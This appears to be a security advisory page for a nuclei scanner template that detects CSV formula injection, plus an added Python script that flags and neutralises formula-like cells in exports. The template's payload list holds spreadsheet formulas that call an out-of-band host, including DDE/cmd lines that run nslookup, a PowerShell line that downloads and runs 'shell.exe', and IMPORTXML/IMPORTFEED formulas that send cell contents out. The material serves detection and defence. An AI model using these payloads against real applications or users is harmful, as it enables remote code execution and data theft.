csv-injection: CSV Injection Detection

Date: 2025-08-01 | Affected software: csv | PoC: public

Vulnerability description

A CSV injection detection template to identify and prevent CSV injection vulnerabilities by using various payloads that could be interpreted as formulas by spreadsheet applications.
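The template below probes an application from the outside; the matching control on the defender's side is to make sure exported cells can never be read as formulas. As an added example that is not part of the original page or the nuclei project, the following Python script scans CSV text for cells starting with a formula trigger (`=`, `+`, `-`, `@`, tab, carriage return), exempts plain numbers such as `-5` so negative balances are not mangled, and rewrites the export with the OWASP-style single-quote prefix so a spreadsheet shows the value literally. The sample export and the `example.invalid` hostname are constructed for the demonstration.

```python
import csv
import io

# Leading characters that spreadsheet applications treat as the start of a
# formula. Tab and carriage return are included because some applications
# strip them before deciding whether the remainder of the cell is a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def _looks_numeric(cell: str) -> bool:
    """True for values like '-5' or '+3.5' that are numbers, not formulas."""
    try:
        float(cell)
        return True
    except ValueError:
        return False


def is_formula_like(cell: str) -> bool:
    """Return True when a spreadsheet would evaluate this cell as a formula."""
    return cell.startswith(FORMULA_TRIGGERS) and not _looks_numeric(cell)


def parse_rows(csv_text: str):
    """Parse CSV text into a list of rows (each a list of cell strings)."""
    return list(csv.reader(io.StringIO(csv_text)))


def find_formula_cells(csv_text: str):
    """Scan CSV text; return (row_index, col_index, value) for each risky cell."""
    findings = []
    for r, row in enumerate(parse_rows(csv_text)):
        for c, cell in enumerate(row):
            if is_formula_like(cell):
                findings.append((r, c, cell))
    return findings


def neutralize_cell(cell: str) -> str:
    """Prefix formula-like values with a single quote so they render as text."""
    if is_formula_like(cell):
        return "'" + cell
    return cell


def sanitize_csv(csv_text: str) -> str:
    """Rewrite CSV text so that no cell can be interpreted as a formula.

    QUOTE_ALL wraps every field in double quotes (doubling any embedded
    quotes), which keeps the single-quote prefix and field separators intact.
    """
    out = io.StringIO()
    writer = csv.writer(out, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in parse_rows(csv_text):
        writer.writerow([neutralize_cell(cell) for cell in row])
    return out.getvalue()


# Constructed sample export (hypothetical data, example.invalid is a reserved
# non-resolving hostname): two formula cells, plus a negative number that must
# be left alone.
SAMPLE_EXPORT = (
    "name,note,balance\n"
    'alice,"=HYPERLINK(""http://example.invalid"",""click"")",-5\n'
    "bob,@SUM(A1:A3),10\n"
    "carol,plain text,+3\n"
)

if __name__ == "__main__":
    for r, c, value in find_formula_cells(SAMPLE_EXPORT):
        print(f"row {r} col {c}: formula-like cell {value!r}")
    print(sanitize_csv(SAMPLE_EXPORT))
```

Run the script directly to see the two flagged cells and the sanitized export; `find_formula_cells` over the sanitized output returns an empty list, which is the check an export pipeline should enforce before handing a file to users. The numeric exemption is a deliberate trade-off: without it, every negative or explicitly signed number would be turned into text.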

PoC code [public]

id: csv-injection

info:
  name: CSV Injection Detection
  author: DhiyaneshDK,ritikchaddha
  severity: medium
  description: |
    A CSV injection detection template to identify and prevent CSV injection vulnerabilities by using various payloads that could be interpreted as formulas by spreadsheet applications.
  tags: dast,csv,oast,vuln

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      csv_fuzz:
        - "class.module.classLoader.resources.context.configFile=http://{{interactsh-url}}"
        - 'DDE ("cmd";"/C nslookup{{interactsh-url}}";"!A0")A0'
        - "@SUM(1+9)*cmd|' /C nslookup{{interactsh-url}}'!A0"
        - "=10+20+cmd|' /C nslookup{{interactsh-url}}'!A0"
        - "=cmd|' /C nslookup{{interactsh-url}}'!'A1'"
        - "=cmd|'/C powershell IEX(wget{{interactsh-url}}/shell.exe)'!A0"
        - '=IMPORTXML(CONCAT("http://{{interactsh-url}}", CONCATENATE(A2:E2)), "//a/a10")'
        - '=IMPORTFEED(CONCAT("http://{{interactsh-url}}/123.txt?v=", CONCATENATE(A2:E2)))'
        - '=IMPORTHTML (CONCAT("http://{{interactsh-url}}/123.txt?v=", CONCATENATE(A2:E2)),"table",1)'
        - '=IMAGE("https://{{interactsh-url}}/images/srpr/logo3w.png")'

    fuzzing:
      - part: query
        type: replace # replaces existing parameter value with fuzz payload
        mode: multiple # replaces all parameters value with fuzz payload
        fuzz:
          - '{{csv_fuzz}}'

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: header
        words:
          - "text/csv"
          - "application/csv"
          - "application/vnd.ms-excel"
# digest: 480a0045304302204b04df532ec328b11991f3ce6db6e0f23ecf716ea56920967543344970fa6a63021f625b58f16210ea97db1831d0ba77a0c027c8687c9b4f9bca4ad0fdc0e0fc1f:922c64590222798bb761d5b6d8e72950
